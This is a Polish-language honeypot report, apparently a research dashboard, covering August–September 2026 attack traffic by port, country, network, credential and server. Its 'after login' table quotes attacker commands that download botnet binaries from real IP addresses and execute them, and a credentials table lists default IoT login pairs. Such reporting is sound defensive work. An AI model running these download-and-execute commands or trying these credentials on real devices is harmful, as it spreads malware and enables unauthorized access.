Ranking portów #
Główna tabela eksperymentu: które porty cieszyły się największym zainteresowaniem wśród atakujących. Można sortować według dowolnej kolumny, filtrować według serwera oraz wyszukiwać konkretny port, zakres lub nazwę usługi. Do każdego wiersza można odwołać się, na przykład #port-3389.
| Port | Protokół | Standardowa usługa | Serwer | Eksperymenty | Unikalny adres IP | Udział |
|---|---|---|---|---|---|---|
| 64861 | tcp | — | srv4 | 1 | 1 | 0,0 % |
| 64888 | tcp | — | oba serwery | 1 | 1 | 0,0 % |
| 64888 | tcp | — | srv4 | 1 | 1 | 0,0 % |
| 64933 | tcp | — | oba serwery | 1 | 1 | 0,0 % |
| 64933 | tcp | — | srv4 | 1 | 1 | 0,0 % |
| 65057 | tcp | — | oba serwery | 1 | 1 | 0,0 % |
| 65057 | tcp | — | srv4 | 1 | 1 | 0,0 % |
| 65074 | tcp | — | oba serwery | 1 | 1 | 0,0 % |
| 65074 | tcp | — | srv4 | 1 | 1 | 0,0 % |
| 65079 | tcp | — | oba serwery | 1 | 1 | 0,0 % |
- Okno czasowe
- 21. 8. 2026 – 16. 9. 2026
- Dane źródłowe
- honeypot-ports-aggregated-20260922.csv
- Skrypt
- zostanie opublikowany
- Format
- dokumentacja pól
Zmiany w czasie #
Liczba zdarzeń w czasie, podzielona na kampanie i szum tła, a poniżej liczba unikalnych adresów IP. Jak wynika z dzienników agentów, poszczególne kampanie generowały większość dziennego ruchu. Bez takiego podziału wykres wprowadzałby w błąd: kampania wyglądałaby jak trend, a jej zakończenie jak przerwa w gromadzeniu danych.
To, w jaki sposób kampania oddziela się od szumu tła, określa skrypt podany pod wykresem.
Liczba zdarzeń
- Szum podstawowy
- Kampanie
Unikalne adresy IP
Liczba różnych adresów IP źródłowych w każdym dniu.
- srv3
- srv4
Nie można sumować unikalnych adresów IP między serwerami – ten sam adres mógł służyć do ataku na oba serwery. Dlatego każdy serwer ma własną linię.
Zaciemnione kolumny i puste kółka oznaczają niekompletne okresy: okno gromadzenia danych rozpoczyna się i kończy o godz. 12:00 UTC, a okres przycięty zgodnie z wybranym zakresem jest krótszy niż pozostałe. Nie należy ich zatem porównywać z sąsiednimi.
Wyświetl wartości w formie tabeli
| Dzień (UTC) | Wydarzenia | Kampanie | Szum podstawowy | Unikalny adres IP srv3 | Unikalny adres IP srv4 |
|---|---|---|---|---|---|
| 22. 8. 2026 · niekompletne | 82 303 | 59 843 | 22 460 | 547 | 1 870 |
| 23. 8. 2026 | 79 276 | 34 177 | 45 099 | 1 292 | 3 529 |
| 24. 8. 2026 | 48 928 | 10 775 | 38 153 | 1 429 | 3 309 |
| 25. 8. 2026 | 69 902 | 29 825 | 40 077 | 1 552 | 3 824 |
| 26. 8. 2026 | 68 792 | 28 709 | 40 083 | 1 552 | 3 775 |
| 27. 8. 2026 | 204 306 | 161 642 | 42 664 | 1 585 | 4 301 |
| 28. 8. 2026 | 201 823 | 159 044 | 42 779 | 1 364 | 4 083 |
| 29. 8. 2026 | 206 275 | 171 641 | 34 634 | 1 029 | 3 853 |
| 30. 8. 2026 | 185 689 | 148 263 | 37 426 | 975 | 4 176 |
| 31. 8. 2026 | 539 919 | 504 248 | 35 671 | 1 488 | 4 183 |
| 1. 9. 2026 | 720 200 | 666 265 | 53 935 | 1 573 | 4 500 |
| 2. 9. 2026 | 275 758 | 209 955 | 65 803 | 1 859 | 4 281 |
| 3. 9. 2026 | 274 675 | 227 972 | 46 703 | 1 621 | 4 343 |
| 4. 9. 2026 | 219 422 | 167 450 | 51 972 | 1 628 | 4 087 |
| 5. 9. 2026 | 154 023 | 95 631 | 58 392 | 1 535 | 4 117 |
| 6. 9. 2026 | 131 807 | 46 399 | 85 408 | 1 637 | 4 349 |
| 7. 9. 2026 | 184 403 | 94 877 | 89 526 | 1 494 | 4 402 |
| 8. 9. 2026 | 169 747 | 59 781 | 109 966 | 1 758 | 4 609 |
| 9. 9. 2026 | 177 572 | 48 861 | 128 711 | 1 733 | 4 671 |
| 10. 9. 2026 | 193 394 | 60 866 | 132 528 | 1 818 | 5 095 |
| 11. 9. 2026 | 210 418 | 63 267 | 147 151 | 1 747 | 5 402 |
| 12. 9. 2026 | 254 827 | 82 831 | 171 996 | 1 859 | 5 450 |
| 13. 9. 2026 | 236 911 | 105 016 | 131 895 | 1 854 | 5 434 |
| 14. 9. 2026 | 213 640 | 83 835 | 129 805 | 1 994 | 5 516 |
| 15. 9. 2026 | 272 074 | 159 141 | 112 933 | 1 884 | 5 303 |
| 16. 9. 2026 · niekompletne | 101 115 | 28 713 | 72 402 | 1 386 | 3 449 |
- Okno czasowe
- 21. 8. 2026 – 16. 9. 2026
- Dane źródłowe
- timeline-aggregated na razie niedostępne
- Skrypt
- zostanie opublikowany
- Format
- dokumentacja pól
Mapa pochodzenia połączeń #
Skąd pochodziły połączenia. Kraj określa się na podstawie rejestracji adresu IP, a nie rzeczywistej lokalizacji atakującego – za adresem może kryć się wynajęty serwer lub zainfekowany komputer w dowolnym miejscu na świecie. Dokładne dane przedstawiono w tabelach poniżej.
Mapa jest generowana przez serwis Datawrapper; podczas jej ładowania przeglądarka łączy się z serwerami tego serwisu. Otwórz mapę osobno
Geografia i sieci #
Skąd pochodził ruch na podstawie geolokalizacji źródłowego adresu IP oraz do jakich autonomicznych systemów (ASN) należą te adresy. Geolokalizacja wskazuje, gdzie adres jest zarejestrowany, a nie gdzie znajduje się osoba atakująca.
Najczęściej wybierane kraje
Największe sieci (ASN)
| ASN | Sieć | Wydarzenia | Unikalny adres IP | Udział |
|---|---|---|---|---|
| 265356 | NET PLANETY INFOTELECOM LTDA ME BR |
1 | 1 | 0,0 % |
| 48092 | NSB-AS T2 Russia Network RU |
1 | 1 | 0,0 % |
| 37642 | Comnet-Lesotho-AS LS |
1 | 1 | 0,0 % |
| 41244 | ZMM-AS UA |
1 | 1 | 0,0 % |
| 31234 | KRAM-AS UA |
1 | 1 | 0,0 % |
| 8542 | EVINY-AS8542 Norway NO |
1 | 1 | 0,0 % |
| 52698 | OPENTEL Comercio e Servicos Ltda BR |
1 | 1 | 0,0 % |
| 39406 | CONVEX-ZARECNY RU |
1 | 1 | 0,0 % |
| 198589 | JT-AS IQ |
1 | 1 | 0,0 % |
| 135212 | DIGIWAY-AS-IN Digiway Net Pvt Ltd IN |
1 | 1 | 0,0 % |
Wyświetl wartości w formie tabeli
| Kraj | Wydarzenia | Unikalny adres IP | Udział |
|---|---|---|---|
| US | 2 057 660 | 13 624 | 37,6 % |
| DE | 1 230 744 | 1 111 | 22,5 % |
| CN | 556 778 | 5 671 | 10,2 % |
| GB | 486 870 | 2 870 | 8,9 % |
| SC | 184 746 | 319 | 3,4 % |
| NL | 120 671 | 174 | 2,2 % |
| TN | 96 601 | 94 | 1,8 % |
| VN | 64 512 | 644 | 1,2 % |
| MX | 59 561 | 281 | 1,1 % |
| IN | 49 705 | 850 | 0,9 % |
- Okno czasowe
- 21. 8. 2026 – 16. 9. 2026
- Dane źródłowe
- geo-aggregated na razie niedostępne
- Skrypt
- zostanie opublikowany
- Format
- dokumentacja pól
Dane logowania #
Kombinacje nazw użytkownika i haseł, które sprawdzali atakujący, oraz najczęściej sprawdzane nazwy użytkowników. Wartości są przedstawione dokładnie tak, jak zostały przesłane.
Najczęściej wybierane nazwy użytkownika
Najczęstsze kombinacje
| Imię | Hasło | Eksperymenty | Unikalny adres IP |
|---|---|---|---|
root |
(puste) | 3 084 | 219 |
admin |
admin |
2 649 | 849 |
enable\x00 |
linuxshell\x00 |
1 955 | 24 |
admin |
(puste) | 1 939 | 69 |
root |
xc3511 |
1 591 | 76 |
root |
admin |
1 529 | 160 |
root |
vizxv |
1 523 | 120 |
root |
123456 |
1 207 | 142 |
support |
support |
990 | 129 |
enable\x00 |
system\x00 |
983 | 27 |
- Okno czasowe
- 21. 8. 2026 – 16. 9. 2026
- Dane źródłowe
- credentials-aggregated na razie niedostępne
- Skrypt
- zostanie opublikowany
- Format
- dokumentacja pól
Co działo się po zalogowaniu #
Polecenia wprowadzone przez atakujących w emulowanej powłoce, uporządkowane według częstotliwości. Jest to dane wprowadzone przez atakującego, a nie kod, który faktycznie byłby wykonywany na serwerze.
| Polecenie | Liczba | Relacje |
|---|---|---|
wget -q -O- -t 1 -T 5 'https://road-exhibition-onion-method.trycloudflare.com/poll' >/dev/null 2>&1 && echo HTTPS_OK |
1 | 1 |
wget -q http://74.81.40.155/cat.sh -O /tmp/cat.sh && chmod 777 /tmp/cat.sh && sh /tmp/cat.sh & |
1 | 1 |
wget http://31.77.227.121/satan_arm5; chmod 777 satan_arm5; ./satan_arm5; rm -rf satan_arm5 |
1 | 1 |
wget http://31.77.227.121/satan_arm6; chmod 777 satan_arm6; ./satan_arm6; rm -rf satan_arm6 |
1 | 1 |
wget http://31.77.227.121/satan_arm7; chmod 777 satan_arm7; ./satan_arm7; rm -rf satan_arm7 |
1 | 1 |
wget http://31.77.227.121/satan_arm; chmod 777 satan_arm; ./satan_arm; rm -rf satan_arm |
1 | 1 |
wget http://31.77.227.121/satan_m68k; chmod 777 satan_m68k; ./satan_m68k; rm -rf satan_m68k |
1 | 1 |
wget http://31.77.227.121/satan_mips_el; chmod 777 satan_mips_el; ./satan_mips_el; rm -rf satan_mips_el |
1 | 1 |
wget http://31.77.227.121/satan_ppc; chmod 777 satan_ppc; ./satan_ppc; rm -rf satan_ppc |
1 | 1 |
wget http://31.77.227.121/satan_sh4; chmod 777 satan_sh4; ./satan_sh4; rm -rf satan_sh4 |
1 | 1 |
- Okno czasowe
- 21. 8. 2026 – 16. 9. 2026
- Dane źródłowe
- attacker-commands-aggregated na razie niedostępne
- Skrypt
- zostanie opublikowany
- Format
- dokumentacja pól
Pobrane próbki #
Pliki, które atakujący próbowali pobrać lub przesłać, w podziale na typ i architekturę.
Według typu pliku
Zgodnie z architekturą
| SHA-256 | Typ | Architektura | Rozmiar | Po raz pierwszy | Uchwycone | Wyszukaj |
|---|---|---|---|---|---|---|
| 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b | data | — | 1 B | 23. 8. 2026 16:54:42 | 492 | VirusTotal |
| 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b | data | — | 1 B | 23. 8. 2026 10:04:58 | 330 | VirusTotal |
| f2e2ffc024ab99eb49fa207756481aa80713398142f30888aebace5706909b36 | data | — | 697 B | 23. 8. 2026 12:07:36 | 243 | VirusTotal |
| a6296a79f44e21b76604d2d2bbf795d2cf380f70e39d45fbf166707ff3b4a6a4 | script | — | 306 B | 22. 8. 2026 18:09:16 | 208 | VirusTotal |
| 4af5a5c98ad132095c6fbe7b02c242153a190a01cc321e50a916a0ca46fbaa62 | data | — | 9 B | 22. 8. 2026 18:09:19 | 206 | VirusTotal |
| 4af5a5c98ad132095c6fbe7b02c242153a190a01cc321e50a916a0ca46fbaa62 | data | — | 9 B | 22. 8. 2026 15:49:53 | 205 | VirusTotal |
| a9b1c85a7bd78dd1112ecc75c9070ea8c53078831a17aa09ebeb287fe6e21b72 | data | — | 9 B | 7. 9. 2026 11:48:13 | 59 | VirusTotal |
| 1193dde1c831808bf6f2db6f5b850b846b8a7f870873ec3b8a347f21cc5d96e3 | data | — | 9 B | 7. 9. 2026 11:48:13 | 59 | VirusTotal |
| 14049d077b887cbb8060d223ff9626664a044a8c3145f6a2b95a325df36b279b | data | — | 7 B | 13. 9. 2026 15:31:53 | 58 | VirusTotal |
| 43728fbfb98bb39ff61a2db0fc2905bd6937997062b05b9ab8b186fdee18c09a | data | — | 399 B | 23. 8. 2026 00:49:29 | 47 | VirusTotal |
- Okno czasowe
- 21. 8. 2026 – 16. 9. 2026
- Dane źródłowe
- samples-aggregated na razie niedostępne
- Skrypt
- zostanie opublikowany
- Format
- dokumentacja pól
Porównanie serwerów #
O ile wzrosło obciążenie dzięki większej powierzchni i czym różnią się oba serwery pod względem struktury.
| Wskaźnik | srv3 | srv4 | srv4 / srv3 |
|---|---|---|---|
| Próby połączenia (lista portów) | 1 462 877 | 4 014 322 | 2,7× |
| Porty, których to dotyczy | 45 | 58 628 | 1 302,8× |
| Zdarzenia (zmiany w czasie) | 1 462 877 | 4 014 322 | 2,7× |
srv3 najczęściej używane porty
srv4 najczęściej używane porty
- Okno czasowe
- 21. 8. 2026 – 16. 9. 2026
- Dane źródłowe
- honeypot-ports-aggregated-20260922.csv, timeline-aggregated na razie niedostępne
- Skrypt
- zostanie opublikowany
- Format
- dokumentacja pól
Czy zauważyliście błąd, brakujące dane lub wyciek danych wrażliwych? Zgłoś problem